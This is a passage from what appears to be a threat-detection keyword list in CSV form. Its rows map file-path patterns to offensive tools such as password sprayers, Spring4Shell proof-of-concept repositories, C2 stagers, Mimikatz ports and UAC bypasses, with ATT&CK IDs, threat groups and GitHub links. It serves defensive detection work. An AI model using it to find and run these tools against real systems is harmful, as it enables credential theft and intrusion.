T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/Spray-AD,1,1,N/A,10,10,408,58,2022-04-01T07:03:39Z,2020-01-09T10:10:48Z -*/sprayers/owa.py*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*/sprayhound.git*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,1,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*/sprayhound/*.py*,offensive_tool_keyword,sprayhound,Password spraying tool and Bloodhound integration,T1110.003 - T1210.001 - T1069.002,TA0006 - TA0007 - TA0003,N/A,N/A,Credential Access,https://github.com/Hackndo/sprayhound,1,1,N/A,N/A,2,136,12,2023-02-15T11:26:53Z,2020-02-06T17:45:37Z -*/spraying.py*,offensive_tool_keyword,Vajra,Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment,T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482,TA0003 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/TROUBLE-1/Vajra,1,1,N/A,N/A,4,336,57,2023-03-16T09:45:53Z,2022-03-01T14:31:27Z -*/SprayingToolkit*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,1,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*/SprayingToolkit.git*,offensive_tool_keyword,SprayingToolkit,Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient,T1110 - T1078 - T1133 - T1061,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/byt3bl33d3r/SprayingToolkit,1,0,N/A,10,10,1352,268,2022-10-17T01:01:57Z,2018-09-13T09:52:11Z -*/Spring4Shell-POC*,offensive_tool_keyword,Spring4Shell,Spring4Shell Proof Of Concept/Information CVE-2022-22965,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/BobTheShoplifter/Spring4Shell-POC,1,1,N/A,N/A,4,335,106,2022-11-09T15:46:06Z,2022-03-30T07:54:45Z -*/Spring4Shell-POC*,offensive_tool_keyword,Spring4Shell,Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/reznok/Spring4Shell-POC,1,1,N/A,N/A,4,303,229,2022-08-04T18:26:18Z,2022-03-31T00:24:28Z -*/SpringCore0day*,offensive_tool_keyword,SpringCore0day,SpringCore0day from share.vx-underground.org & some additional links,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/craig/SpringCore0day,1,1,N/A,N/A,4,394,187,2022-03-31T11:54:22Z,2022-03-30T15:50:28Z -*/spring-core-rce*,offensive_tool_keyword,spring-core-rce,CVE-2022-22965 : about spring core rce,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Mr-xn/spring-core-rce,1,1,N/A,N/A,1,54,18,2022-04-01T15:34:03Z,2022-03-30T14:35:00Z -*/Spring-CVE/*,offensive_tool_keyword,POC,POC exploit for CVE-2022-22963,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/kh4sh3i/Spring-CVE,1,1,N/A,N/A,1,13,7,2022-03-31T20:58:54Z,2022-03-31T20:19:51Z -*/SpringFramework_CVE-2022-22965_RCE*,offensive_tool_keyword,POC,SpringFramework CVE-2022-22965,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/Axx8/SpringFramework_CVE-2022-22965_RCE,1,0,N/A,N/A,1,76,17,2022-04-01T12:08:45Z,2022-04-01T04:51:44Z -*/springshell-rce-poc*,offensive_tool_keyword,Spring4Shell,CVE-2022-22965 - CVE-2010-1622 redux,T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DDuarte/springshell-rce-poc,1,1,N/A,N/A,1,21,12,2023-04-18T14:15:42Z,2022-03-31T08:06:46Z -*/sql_inj.txt*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*/sqli.txt*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/sqli/mssqli*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sqli/mysqli*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sqli/postgresqli*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sqli/sqlitei*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sqli/utils*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sqli_test.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/Sqlmap*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1059 - T1553 - T1574 - T1210 - T1220,TA0001 - TA0002 - TA0003 - TA0009,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*/sqlmap.zip*,offensive_tool_keyword,sqlipy,SQLiPy is a Python plugin for Burp Suite that integrates SQLMap using the SQLMap API.,T1190 - T1210 - T1574,TA0002 - TA0040 - TA0043,N/A,N/A,Network Exploitation tools,https://github.com/codewatchorg/sqlipy,1,1,N/A,N/A,3,247,102,2023-05-08T18:50:41Z,2014-09-22T03:25:42Z -*/SQLRecon*,offensive_tool_keyword,SQLRecon,A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation,T1003.003 - T1049 - T1059.005 - T1078.003,TA0005 - TA0006 - TA0002 - TA0004,N/A,N/A,Network Exploitation Tools,https://github.com/skahwah/SQLRecon,1,1,N/A,N/A,6,502,97,2023-08-10T00:42:31Z,2021-11-19T15:58:49Z -*/sqrtZeroKnowledge/CVE-*,offensive_tool_keyword,poc,Exploit for the CVE-2023-23398,T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550,TA0003 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY,1,1,N/A,N/A,2,158,46,2023-03-15T17:53:53Z,2023-03-15T17:03:38Z -*/src/exploit.html.tpl*,offensive_tool_keyword,POC,Just another PoC for the new MSDT-Exploit,T1190 - T1203 - T1068 - T1210,TA0001 - TA0002 - TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed,1,1,N/A,N/A,4,387,57,2023-04-13T16:46:26Z,2022-06-02T12:33:18Z -*/src/john.com*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/src/jumbo.c*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/src/jumbo.h*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*/src/nysm.c*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,0,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z -*/src/RecycledGate.h*,offensive_tool_keyword,RecycledInjector,Native Syscalls Shellcode Injector,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/florylsk/RecycledInjector,1,1,N/A,N/A,3,213,35,2023-07-02T11:04:28Z,2023-06-23T16:14:56Z -*/src/Sleeper.cpp*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*/srdi-shellcode.go*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,1,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*/ssh2-enum-algos.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssh-auth-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssh-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssh-hostkey.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssh-publickey-acceptance.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssh-run.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sshv1.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-ccs-injection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-cert.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-cert-intaddr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-date.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-dh-params.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-enum-ciphers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-heartbleed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-known-key.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssl-poodle.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sslv2.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/sslv2-drown.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/ssp/decryptor.py,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*/SspiUacBypass.git*,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,1,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -*/ssploit/*,offensive_tool_keyword,spoolsploit,A collection of Windows print spooler exploits containerized with other utilities for practical exploitation.,T1204 - T1547 - T1562 - T1003 - T1018 - T1570 - T1005,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009,N/A,N/A,Exploitation tools,https://github.com/BeetleChunks/SpoolSploit,1,1,N/A,N/A,6,533,90,2021-07-16T04:49:43Z,2021-07-07T00:32:28Z -*/SSRFmap*,offensive_tool_keyword,SSRFmap,Automatic SSRF fuzzer and exploitation tool,T1210 - T1211 - T1212 - T1574,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/swisskyrepo/SSRFmap,1,1,N/A,N/A,10,2463,459,2023-05-27T19:30:08Z,2018-10-15T19:08:26Z -*/sstp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/StackCrypt.git*,offensive_tool_keyword,StackCrypt,Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads,T1027 - T1055.004 - T1486,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/StackCrypt,1,1,N/A,9,2,144,23,2023-08-02T02:25:12Z,2023-04-26T03:24:56Z -*/stage_wmi*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/stager.ps1*,offensive_tool_keyword,SharpC2,Command and Control Framework written in C#,T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573,TA0001 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/rasta-mouse/SharpC2,1,1,N/A,10,10,303,45,2023-07-27T12:25:54Z,2022-10-26T12:18:07Z -*/stager/powershell.py*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/stager/powershell/payload.ps1*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/stagers/*.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - 